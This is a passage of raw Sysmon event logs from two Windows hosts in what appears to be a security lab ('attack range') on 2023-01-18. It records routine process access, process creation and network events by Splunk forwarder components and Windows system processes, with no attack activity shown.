Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000041603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:27.040{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56290-false10.0.1.12-8089- 23542300x800000000000000041602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:28.645{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F310F71A1E1DCCCC0B3C249514E323B4,SHA256=CB94C8F46BF274A9DBFC4B3A33134FAA81C106BB2356FA3D48B12F7C9BC97B4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.981{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE61C750C6883CB928328A2C86E8122F,SHA256=44D8F66FBEADA27994060AA15644FAA9A1FAAAB19FA8C7B1C61ADC73A6DB5510,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:27.681{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56291-false10.0.1.12-8000- 10341000x800000000000000041621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.771{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E449-63C7-2106-00000000AF02}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.771{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.771{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.771{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.771{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.771{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E449-63C7-2106-00000000AF02}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.771{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E449-63C7-2106-00000000AF02}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.773{FE4C2B44-E449-63C7-2106-00000000AF02}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:29.751{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9000F22DCE527739DD42BC5D3C4A330,SHA256=6E933948886DEDF60665CDA5E1E92A118917AAF1C8EA96EC19829FBB126B25E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016332Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.916{E5A8D418-E449-63C7-FD01-00000000B002}14682416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016331Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E449-63C7-FD01-00000000B002}1468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016330Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016329Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016328Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016327Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016326Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016325Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016324Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016323Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016322Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016321Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E449-63C7-FD01-00000000B002}1468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016320Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.744{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E449-63C7-FD01-00000000B002}1468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016319Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.745{E5A8D418-E449-63C7-FD01-00000000B002}1468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016318Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.650{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=6CEC8972171240B814FD1E6DBFC0C30A,SHA256=D15548DCD4698F4D534B90CF179F110AD7FB13D0BC9D0F466CEB874286A07853,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016317Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E449-63C7-FC01-00000000B002}848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016316Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:29.131{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016315Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 